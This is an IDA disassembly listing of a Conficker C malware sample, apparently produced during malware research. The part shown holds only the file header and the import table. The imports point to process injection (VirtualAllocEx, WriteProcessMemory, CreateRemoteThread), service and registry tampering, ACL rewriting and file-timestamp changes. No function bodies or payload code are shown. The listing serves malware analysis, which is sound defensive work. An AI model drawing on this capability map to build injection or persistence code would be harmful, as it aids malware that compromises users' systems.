;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 2C7CA6DBC7F9B13F68B18228C531382F
; File Name : /space/hassen/idata_conficker_c.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 9A0000
; Section 1. (virtual address 00001000)
; Virtual size : 00027000 ( 159744.)
; Section size in file : 00026005 ( 155653.)
; Offset to raw data for section: 00000200
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
;
; Imports from advapi32.dll
;
; OS type : MS Windows
; Application type: DLL 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; LSTATUS __stdcall RegCreateKeyExW(HKEY hKey,LPCWSTR lpSubKey,DWORD Reserved,LPWSTR lpClass,DWORD dwOptions,REGSAM samDesired,const LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition)
extrn RegCreateKeyExW:dword ; CODE XREF: sub_9A7B42+104�p
; sub_9A7B42+15A�p ...
; LSTATUS __stdcall RegFlushKey(HKEY hKey)
extrn RegFlushKey:dword ; CODE XREF: sub_9A7B42+271�p
; DATA XREF: sub_9A7B42+271�r
; SC_HANDLE __stdcall OpenSCManagerW(LPCWSTR lpMachineName,LPCWSTR lpDatabaseName,DWORD dwDesiredAccess)
extrn OpenSCManagerW:dword ; CODE XREF: sub_9A7374+4B�p
; DATA XREF: sub_9A7374+4B�r
; BOOL __stdcall EnumServicesStatusW(SC_HANDLE hSCManager,DWORD dwServiceType,DWORD dwServiceState,LPENUM_SERVICE_STATUSW lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle)
extrn EnumServicesStatusW:dword ; CODE XREF: sub_9A7374+A8�p
; DATA XREF: sub_9A7374+A8�r
; BOOL __stdcall QueryServiceConfigW(SC_HANDLE hService,LPQUERY_SERVICE_CONFIGW lpServiceConfig,DWORD cbBufSize,LPDWORD pcbBytesNeeded)
extrn QueryServiceConfigW:dword ; CODE XREF: sub_9A7374+18E�p
; DATA XREF: sub_9A7374+18E�r
; BOOL __stdcall QueryServiceConfig2W(SC_HANDLE hService,DWORD dwInfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded)
extrn QueryServiceConfig2W:dword ; CODE XREF: sub_9A7374+1B3�p
; DATA XREF: sub_9A7374+1B3�r
; DWORD __stdcall GetNamedSecurityInfoW(LPWSTR pObjectName,SE_OBJECT_TYPE ObjectType,SECURITY_INFORMATION SecurityInfo,PSID *ppsidOwner,PSID *ppsidGroup,PACL *ppDacl,PACL *ppSacl,PSECURITY_DESCRIPTOR *ppSecurityDescriptor)
extrn GetNamedSecurityInfoW:dword ; CODE XREF: sub_9A706C+57�p
; DATA XREF: sub_9A706C+57�r
; DWORD __stdcall SetEntriesInAclW(ULONG cCountOfExplicitEntries,PEXPLICIT_ACCESS_W pListOfExplicitEntries,PACL OldAcl,PACL *NewAcl)
extrn SetEntriesInAclW:dword ; CODE XREF: sub_9A6E7C+94�p
; DATA XREF: sub_9A6E7C+94�r
; DWORD __stdcall SetNamedSecurityInfoW(LPWSTR pObjectName,SE_OBJECT_TYPE ObjectType,SECURITY_INFORMATION SecurityInfo,PSID psidOwner,PSID psidGroup,PACL pDacl,PACL pSacl)
extrn SetNamedSecurityInfoW:dword ; CODE XREF: sub_9A6E36+2C�p
; sub_9A6E7C+B1�p ...
; LSTATUS __stdcall RegEnumKeyExW(HKEY hKey,DWORD dwIndex,LPWSTR lpName,LPDWORD lpcchName,LPDWORD lpReserved,LPWSTR lpClass,LPDWORD lpcchClass,PFILETIME lpftLastWriteTime)
extrn RegEnumKeyExW:dword ; CODE XREF: sub_9A6CF7+83�p
; DATA XREF: sub_9A6CF7+1C�r
; LSTATUS __stdcall RegSetKeySecurity(HKEY hKey,SECURITY_INFORMATION SecurityInformation,PSECURITY_DESCRIPTOR pSecurityDescriptor)
extrn RegSetKeySecurity:dword ; CODE XREF: sub_9A6BEB+B7�p
; DATA XREF: sub_9A6BEB+B7�r
; BOOL __stdcall GetTokenInformation(HANDLE TokenHandle,TOKEN_INFORMATION_CLASS TokenInformationClass,LPVOID TokenInformation,DWORD TokenInformationLength,PDWORD ReturnLength)
extrn GetTokenInformation:dword ; CODE XREF: sub_9A6A91+43�p
; sub_9A6A91+7F�p ...
; BOOL __stdcall EqualSid(PSID pSid1,PSID pSid2)
extrn EqualSid:dword ; CODE XREF: sub_9A6A91+F2�p
; sub_9A6A91+102�p
; DATA XREF: ...
; BOOL __stdcall InitializeSecurityDescriptor(PSECURITY_DESCRIPTOR pSecurityDescriptor,DWORD dwRevision)
extrn InitializeSecurityDescriptor:dword ; CODE XREF: sub_9A68CA+6F�p
; sub_9A6BEB+9A�p
; DATA XREF: ...
; BOOL __stdcall AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority,BYTE nSubAuthorityCount,DWORD nSubAuthority0,DWORD nSubAuthority1,DWORD nSubAuthority2,DWORD nSubAuthority3,DWORD nSubAuthority4,DWORD nSubAuthority5,DWORD nSubAuthority6,DWORD nSubAuthority7,PSID *pSid)
extrn AllocateAndInitializeSid:dword ; CODE XREF: sub_9A68CA+98�p
; sub_9A6A91+BB�p ...
; DWORD __stdcall GetLengthSid(PSID pSid)
extrn GetLengthSid:dword ; CODE XREF: sub_9A68CA+A1�p
; sub_9A6BEB+59�p
; DATA XREF: ...
; BOOL __stdcall InitializeAcl(PACL pAcl,DWORD nAclLength,DWORD dwAclRevision)
extrn InitializeAcl:dword ; CODE XREF: sub_9A68CA+CC�p
; sub_9A6BEB+7D�p
; DATA XREF: ...
; BOOL __stdcall AddAccessAllowedAce(PACL pAcl,DWORD dwAceRevision,DWORD AccessMask,PSID pSid)
extrn AddAccessAllowedAce:dword ; CODE XREF: sub_9A68CA+DB�p
; sub_9A6BEB+8E�p
; DATA XREF: ...
; BOOL __stdcall SetSecurityDescriptorDacl(PSECURITY_DESCRIPTOR pSecurityDescriptor,BOOL bDaclPresent,PACL pDacl,BOOL bDaclDefaulted)
extrn SetSecurityDescriptorDacl:dword ; CODE XREF: sub_9A68CA+EB�p
; sub_9A6BEB+A8�p
; DATA XREF: ...
; BOOL __stdcall SetFileSecurityA(LPCSTR lpFileName,SECURITY_INFORMATION SecurityInformation,PSECURITY_DESCRIPTOR pSecurityDescriptor)
extrn SetFileSecurityA:dword ; CODE XREF: sub_9A68CA+FA�p
; DATA XREF: sub_9A68CA+FA�r
; PVOID __stdcall FreeSid(PSID pSid)
extrn FreeSid:dword ; CODE XREF: sub_9A68CA+13E�p
; sub_9A6A91+12C�p ...
; BOOL __stdcall OpenProcessToken(HANDLE ProcessHandle,DWORD DesiredAccess,PHANDLE TokenHandle)
extrn OpenProcessToken:dword ; CODE XREF: sub_9A5DFA+16�p
; sub_9A6A91+23�p ...
; BOOL __stdcall LookupPrivilegeValueA(LPCSTR lpSystemName,LPCSTR lpName,PLUID lpLuid)
extrn LookupPrivilegeValueA:dword ; CODE XREF: sub_9A5DFA+3C�p
; DATA XREF: sub_9A5DFA+3C�r
; BOOL __stdcall AdjustTokenPrivileges(HANDLE TokenHandle,BOOL DisableAllPrivileges,PTOKEN_PRIVILEGES NewState,DWORD BufferLength,PTOKEN_PRIVILEGES PreviousState,PDWORD ReturnLength)
extrn AdjustTokenPrivileges:dword ; CODE XREF: sub_9A5DFA+52�p
; DATA XREF: sub_9A5DFA+52�r
; SC_HANDLE __stdcall OpenServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,DWORD dwDesiredAccess)
extrn OpenServiceA:dword ; CODE XREF: sub_9A5D62+2B�p
; DATA XREF: sub_9A5D62+2B�r
; BOOL __stdcall ControlService(SC_HANDLE hService,DWORD dwControl,LPSERVICE_STATUS lpServiceStatus)
extrn ControlService:dword ; CODE XREF: sub_9A5D62+59�p
; DATA XREF: sub_9A5D62+59�r
; BOOL __stdcall ChangeServiceConfigA(SC_HANDLE hService,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword,LPCSTR lpDisplayName)
extrn ChangeServiceConfigA:dword ; CODE XREF: sub_9A5D62+7F�p
; DATA XREF: sub_9A5D62+7F�r
; LSTATUS __stdcall RegSetValueExW(HKEY hKey,LPCWSTR lpValueName,DWORD Reserved,DWORD dwType,const BYTE *lpData,DWORD cbData)
extrn RegSetValueExW:dword ; CODE XREF: sub_9A471B+1C2�p
; sub_9A7641+1ED�p ...
; LSTATUS __stdcall RegOpenKeyExW(HKEY hKey,LPCWSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult)
extrn RegOpenKeyExW:dword ; CODE XREF: sub_9A4358+116�p
; sub_9A4358+157�p ...
; LSTATUS __stdcall RegQueryValueExW(HKEY hKey,LPCWSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData)
extrn RegQueryValueExW:dword ; CODE XREF: sub_9A4358+1B4�p
; sub_9A4358+20B�p ...
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_9A4358+36D�p
; sub_9A471B+1FA�p ...
; SC_HANDLE __stdcall OpenSCManagerA(LPCSTR lpMachineName,LPCSTR lpDatabaseName,DWORD dwDesiredAccess)
extrn OpenSCManagerA:dword ; CODE XREF: sub_9A428D+2C�p
; sub_9A5D62+13�p
; DATA XREF: ...
; SC_HANDLE __stdcall OpenServiceW(SC_HANDLE hSCManager,LPCWSTR lpServiceName,DWORD dwDesiredAccess)
extrn OpenServiceW:dword ; CODE XREF: sub_9A428D+3C�p
; sub_9A7374+168�p
; DATA XREF: ...
; BOOL __stdcall CloseServiceHandle(SC_HANDLE hSCObject)
extrn CloseServiceHandle:dword ; CODE XREF: sub_9A428D+95�p
; sub_9A428D+AE�p ...
; BOOL __stdcall QueryServiceStatus(SC_HANDLE hService,LPSERVICE_STATUS lpServiceStatus)
extrn QueryServiceStatus:dword ; CODE XREF: sub_9A428D+53�p
; sub_9A5D62+42�p
; DATA XREF: ...
; BOOL __stdcall QueryServiceConfigA(SC_HANDLE hService,LPQUERY_SERVICE_CONFIGA lpServiceConfig,DWORD cbBufSize,LPDWORD pcbBytesNeeded)
extrn QueryServiceConfigA:dword ; CODE XREF: sub_9A428D+6B�p
; DATA XREF: sub_9A428D+6B�r
; BOOL __stdcall CryptReleaseContext(HCRYPTPROV hProv,ULONG_PTR dwFlags)
extrn CryptReleaseContext:dword ; CODE XREF: sub_9AA577+7D�p
; DATA XREF: sub_9AA577+7D�r
; BOOL __stdcall CryptGenRandom(HCRYPTPROV hProv,DWORD dwLen,BYTE *pbBuffer)
extrn CryptGenRandom:dword ; CODE XREF: sub_9AA577+72�p
; DATA XREF: sub_9AA577+72�r
; BOOL __stdcall CryptAcquireContextA(HCRYPTPROV *phProv,LPCSTR szContainer,LPCSTR szProvider,DWORD dwProvType,DWORD dwFlags)
extrn CryptAcquireContextA:dword ; CODE XREF: sub_9AA577+59�p
; DATA XREF: sub_9AA577+59�r
;
; Imports from kernel32.dll
;
; BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName,LPCSTR lpNewFileName)
extrn MoveFileA:dword ; CODE XREF: sub_9A3715+AF�p
; DATA XREF: sub_9A3715+AF�r
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: sub_9A3715+8D�p
; sub_9A6056+74�p ...
; DWORD __stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer)
extrn GetTempPathA:dword ; CODE XREF: sub_9A387C+97�p
; sub_9A7214+6C�p
; DATA XREF: ...
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer,UINT uSize)
extrn GetSystemDirectoryA:dword ; CODE XREF: sub_9A387C+26�p
; sub_9A7214+38�p ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_9A3939+A�p
; StartAddress+39�p ...
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_9A39CF+90�p
; sub_9A3C63+17D�p ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_9A39CF+89�p
; sub_9A3C63+251�p ...
; BOOL __stdcall LockFile(HANDLE hFile,DWORD dwFileOffsetLow,DWORD dwFileOffsetHigh,DWORD nNumberOfBytesToLockLow,DWORD nNumberOfBytesToLockHigh)
extrn LockFile:dword ; CODE XREF: sub_9A3A68+5A�p
; DATA XREF: sub_9A3A68+5A�r
; DWORD __stdcall GetFileSize(HANDLE hFile,LPDWORD lpFileSizeHigh)
extrn GetFileSize:dword ; CODE XREF: sub_9A3A68+50�p
; sub_9A5FCF+2D�p
; DATA XREF: ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_9A3A68+2F�p
; sub_9A3A68+44�p ...
; void __stdcall GetLocalTime(LPSYSTEMTIME lpSystemTime)
extrn GetLocalTime:dword ; CODE XREF: StartAddress+EE�p
; StartAddress+136�p
; DATA XREF: ...
; DWORD __stdcall GetVersion()
extrn GetVersion:dword ; CODE XREF: StartAddress:loc_9A3B65�p
; sub_9A3C63+1A3�p ...
; UINT __stdcall SetErrorMode(UINT uMode)
extrn SetErrorMode:dword ; CODE XREF: StartAddress+23�p
; DATA XREF: StartAddress+23�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_9A3C63+199�p
; .text:009AAABA�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: sub_9A3C63+12A�p
; DATA XREF: sub_9A3C63+12A�r
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_9A3C63+11A�p
; DllMain(x,x,x)+9A�p ...
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes,BOOL bInitialOwner,LPCSTR lpName)
extrn CreateMutexA:dword ; CODE XREF: sub_9A3C63+E9�p
; sub_9A3C63+115�p ...
; BOOL __stdcall GetComputerNameA(LPSTR lpBuffer,LPDWORD nSize)
extrn GetComputerNameA:dword ; CODE XREF: sub_9A3C63+66�p
; DATA XREF: sub_9A3C63+66�r
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: DllMain(x,x,x)+58�p
; sub_9A5656+24�p ...
; BOOL __stdcall DisableThreadLibraryCalls(HMODULE hLibModule)
extrn DisableThreadLibraryCalls:dword ; CODE XREF: DllMain(x,x,x)+4E�p
; DATA XREF: DllMain(x,x,x)+4E�r
; BOOL __stdcall MoveFileExA(LPCSTR lpExistingFileName,LPCSTR lpNewFileName,DWORD dwFlags)
extrn MoveFileExA:dword ; CODE XREF: sub_9A3715+FE�p
; DATA XREF: sub_9A3715+FE�r
; BOOL __stdcall Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
extrn __imp_Process32First:dword ; DATA XREF: Process32First�r
; HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
extrn __imp_CreateToolhelp32Snapshot:dword
; DATA XREF: CreateToolhelp32Snapshot�r
; BOOL __stdcall ReadFile(HANDLE hFile,LPVOID lpBuffer,DWORD nNumberOfBytesToRead,LPDWORD lpNumberOfBytesRead,LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_9A4157+84�p
; sub_9A5FCF+51�p
; DATA XREF: ...
; HANDLE __stdcall CreateFileW(LPCWSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn CreateFileW:dword ; CODE XREF: sub_9A4157+4E�p
; DATA XREF: sub_9A4157+4E�r
; BOOL __stdcall MoveFileExW(LPCWSTR lpExistingFileName,LPCWSTR lpNewFileName,DWORD dwFlags)
extrn MoveFileExW:dword ; CODE XREF: sub_9A4358+349�p
; DATA XREF: sub_9A4358+349�r
; BOOL __stdcall DeleteFileW(LPCWSTR lpFileName)
extrn DeleteFileW:dword ; CODE XREF: sub_9A4358+336�p
; DATA XREF: sub_9A4358+336�r
; int __stdcall WideCharToMultiByte(UINT CodePage,DWORD dwFlags,LPCWSTR lpWideCharStr,int cchWideChar,LPSTR lpMultiByteStr,int cbMultiByte,LPCSTR lpDefaultChar,LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: sub_9A4358+30C�p
; sub_9A5421+60�p ...
; DWORD __stdcall ExpandEnvironmentStringsW(LPCWSTR lpSrc,LPWSTR lpDst,DWORD nSize)
extrn ExpandEnvironmentStringsW:dword ; CODE XREF: sub_9A4358+22A�p
; sub_9A4358+25E�p
; DATA XREF: ...
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags,SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_9A4358+85�p
; sub_9A4358+1E1�p ...
; int __stdcall MultiByteToWideChar(UINT CodePage,DWORD dwFlags,LPCSTR lpMultiByteStr,int cbMultiByte,LPWSTR lpWideCharStr,int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: sub_9A4358+39�p
; sub_9A514A+3B�p ...
; BOOL __stdcall TerminateThread(HANDLE hThread,DWORD dwExitCode)
extrn TerminateThread:dword ; CODE XREF: sub_9A49B2+169�p
; sub_9A4FEF+30�p
; DATA XREF: ...
; BOOL __stdcall GetExitCodeThread(HANDLE hThread,LPDWORD lpExitCode)
extrn GetExitCodeThread:dword ; CODE XREF: sub_9A49B2+154�p
; DATA XREF: sub_9A49B2+154�r
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: sub_9A49B2+128�p
; sub_9A5D1A+7�p ...
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: sub_9A4F90+20�p
; sub_9A5238+20�p ...
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle,DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_9A4FEF+21�p
; DATA XREF: sub_9A4FEF+21�r
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_9A52FE+26�p
; sub_9A53E9+29�p ...
; BOOL __stdcall Module32Next(HANDLE hSnapshot,LPMODULEENTRY32 lpme)
extrn __imp_Module32Next:dword ; DATA XREF: Module32Next�r
; BOOL __stdcall Module32First(HANDLE hSnapshot,LPMODULEENTRY32 lpme)
extrn __imp_Module32First:dword ; DATA XREF: Module32First�r
; void __stdcall ExitThread(DWORD dwExitCode)
extrn ExitThread:dword ; CODE XREF: sub_9A58F0+38�p
; sub_9A714D+2�p
; DATA XREF: ...
; BOOL __stdcall SetThreadPriority(HANDLE hThread,int nPriority)
extrn SetThreadPriority:dword ; CODE XREF: sub_9A5938+FD�p
; sub_9A5938+116�p ...
; BOOL __stdcall VirtualProtect(LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect)
extrn VirtualProtect:dword ; CODE XREF: sub_9A5938+DF�p
; sub_9A5938+124�p
; DATA XREF: ...
; int __stdcall GetThreadPriority(HANDLE hThread)
extrn GetThreadPriority:dword ; CODE XREF: sub_9A5938+2E�p
; DATA XREF: sub_9A5938+2E�r
; HANDLE __stdcall GetCurrentThread()
extrn GetCurrentThread:dword ; CODE XREF: sub_9A5938+24�p
; DATA XREF: sub_9A5938+24�r
; BOOL __stdcall VirtualFree(LPVOID lpAddress,SIZE_T dwSize,DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: sub_9A5A91+6E�p
; DATA XREF: sub_9A5A91+6E�r
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: sub_9A5A91+47�p
; DATA XREF: sub_9A5A91+47�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_9A5A91+30�p
; sub_9A642B+7B�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_9A5A91+21�p
; sub_9A731F+11�p
; DATA XREF: ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_9A5A91+14�p
; sub_9A5BCD+5�p ...
; BOOL __stdcall GetVolumeInformationA(LPCSTR lpRootPathName,LPSTR lpVolumeNameBuffer,DWORD nVolumeNameSize,LPDWORD lpVolumeSerialNumber,LPDWORD lpMaximumComponentLength,LPDWORD lpFileSystemFlags,LPSTR lpFileSystemNameBuffer,DWORD nFileSystemNameSize)
extrn GetVolumeInformationA:dword ; CODE XREF: sub_9B5228+20�p
; DATA XREF: sub_9B5228+20�r
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: sub_9A5D1A:loc_9A5D49�p
; sub_9A60D7+AE�p ...
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: sub_9A5D1A+1B�p
; sub_9AA577+1D�p ...
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_9A5DFA+F�p
; sub_9A6A91+1C�p ...
; BOOL __stdcall SetFileTime(HANDLE hFile,const FILETIME *lpCreationTime,const FILETIME *lpLastAccessTime,const FILETIME *lpLastWriteTime)
extrn SetFileTime:dword ; CODE XREF: sub_9A5EC7+CE�p
; sub_9A5EC7+EA�p
; DATA XREF: ...
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn GetFileAttributesA:dword ; CODE XREF: sub_9A5EC7+92�p
; sub_9A682F+6�p
; DATA XREF: ...
; BOOL __stdcall GetFileTime(HANDLE hFile,LPFILETIME lpCreationTime,LPFILETIME lpLastAccessTime,LPFILETIME lpLastWriteTime)
extrn GetFileTime:dword ; CODE XREF: sub_9A5EC7+7B�p
; DATA XREF: sub_9A5EC7+7B�r
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_9A6056+40�p
; sub_9A7214+BE�p
; DATA XREF: ...
; BOOL __stdcall SetEndOfFile(HANDLE hFile)
extrn SetEndOfFile:dword ; CODE XREF: sub_9A6056+2D�p
; DATA XREF: sub_9A6056+2D�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: sub_9A62C0+A3�p
; DATA XREF: sub_9A62C0+A3�r
; HANDLE __stdcall OpenProcess(DWORD dwDesiredAccess,BOOL bInheritHandle,DWORD dwProcessId)
extrn OpenProcess:dword ; CODE XREF: sub_9A62C0+92�p
; sub_9A642B+32�p ...
; BOOL __stdcall Thread32Next(HANDLE hSnapshot,LPTHREADENTRY32 lpte)
extrn __imp_Thread32Next:dword ; DATA XREF: Thread32Next�r
; DWORD __stdcall SuspendThread(HANDLE hThread)
extrn SuspendThread:dword ; CODE XREF: sub_9A62C0+64�p
; DATA XREF: sub_9A62C0+64�r
; HANDLE __stdcall OpenThread(DWORD dwDesiredAccess,BOOL bInheritHandle,DWORD dwThreadId)
extrn OpenThread:dword ; CODE XREF: sub_9A62C0+54�p
; sub_9A642B+147�p
; DATA XREF: ...
; HGLOBAL __stdcall GlobalFree(HGLOBAL hMem)
extrn GlobalFree:dword ; CODE XREF: sub_9A3715+107�p
; sub_9A4358+32A�p ...
; HANDLE __stdcall CreateRemoteThread(HANDLE hProcess,LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
extrn CreateRemoteThread:dword ; CODE XREF: sub_9A642B+AF�p
; DATA XREF: sub_9A642B+AF�r
; BOOL __stdcall WriteProcessMemory(HANDLE hProcess,LPVOID lpBaseAddress,LPCVOID lpBuffer,SIZE_T nSize,SIZE_T *lpNumberOfBytesWritten)
extrn WriteProcessMemory:dword ; CODE XREF: sub_9A642B+8F�p
; DATA XREF: sub_9A642B+8F�r
; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess,LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAllocEx:dword ; CODE XREF: sub_9A642B+50�p
; DATA XREF: sub_9A642B+50�r
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess,LPCVOID lpBaseAddress,LPVOID lpBuffer,SIZE_T nSize,SIZE_T *lpNumberOfBytesRead)
extrn ReadProcessMemory:dword ; CODE XREF: sub_9A65D9+33�p
; sub_9A65D9+4A�p ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName,DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: sub_9A682F+2C�p
; sub_9A682F+92�p
; DATA XREF: ...
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName,LPSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCSTR lpCurrentDirectory,LPSTARTUPINFOA lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_9A6A21+4E�p
; DATA XREF: sub_9A6A21+4E�r
; HLOCAL __stdcall LocalFree(HLOCAL hMem)
extrn LocalFree:dword ; CODE XREF: sub_9A6E7C+D5�p
; DATA XREF: sub_9A6E7C+D5�r
; SIZE_T __stdcall VirtualQuery(LPCVOID lpAddress,PMEMORY_BASIC_INFORMATION lpBuffer,SIZE_T dwLength)
extrn VirtualQuery:dword ; CODE XREF: sub_9A71B6+18�p
; sub_9A71B6+32�p
; DATA XREF: ...
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName,LPCSTR lpPrefixString,UINT uUnique,LPSTR lpTempFileName)
extrn GetTempFileNameA:dword ; CODE XREF: sub_9A7214+5E�p
; sub_9A7214+88�p
; DATA XREF: ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_9A731F+49�p
; DATA XREF: sub_9A731F+49�r
; BOOL __stdcall SystemTimeToFileTime(const SYSTEMTIME *lpSystemTime,LPFILETIME lpFileTime)
extrn SystemTimeToFileTime:dword ; CODE XREF: sub_9A83C7+9A�p
; DATA XREF: sub_9A83C7+9A�r
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn GetSystemTime:dword ; CODE XREF: sub_9A83C7+78�p
; sub_9AA577+27�p
; DATA XREF: ...
; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
extrn GetSystemTimeAsFileTime:dword ; CODE XREF: sub_9AA660+1C9�p
; DATA XREF: sub_9AA660+1C9�r
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: sub_9A3620+24�p
; sub_9A3C63+36�p ...
; BOOL __stdcall Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
extrn __imp_Process32Next:dword ; DATA XREF: Process32Next�r
; BOOL __stdcall Thread32First(HANDLE hSnapshot,LPTHREADENTRY32 lpte)
extrn __imp_Thread32First:dword ; DATA XREF: Thread32First�r
;
; Imports from msvcrt.dll
;
extrn _adjust_fdiv:dword ; DATA XREF: _CRT_INIT(x,x,x):loc_9AAC45�r
extrn __imp__initterm:dword ; DATA XREF: _initterm�r
; void *__cdecl calloc(size_t NumOfElements,size_t SizeOfElements)
extrn calloc:dword ; CODE XREF: sub_9A9C7E+41�p
; DATA XREF: sub_9A9C7E+41�r
; int __cdecl memcmp(const void *Buf1,const void *Buf2,size_t Size)
extrn __imp_memcmp:dword ; DATA XREF: memcmp�r
; char *__cdecl strcat(char *Dest,const char *Source)
extrn __imp_strcat:dword ; DATA XREF: strcat�r
; __int32 __cdecl labs(__int32 X)
extrn __imp_labs:dword ; DATA XREF: labs�r
extrn __imp_sin:dword ; DATA XREF: sin�r
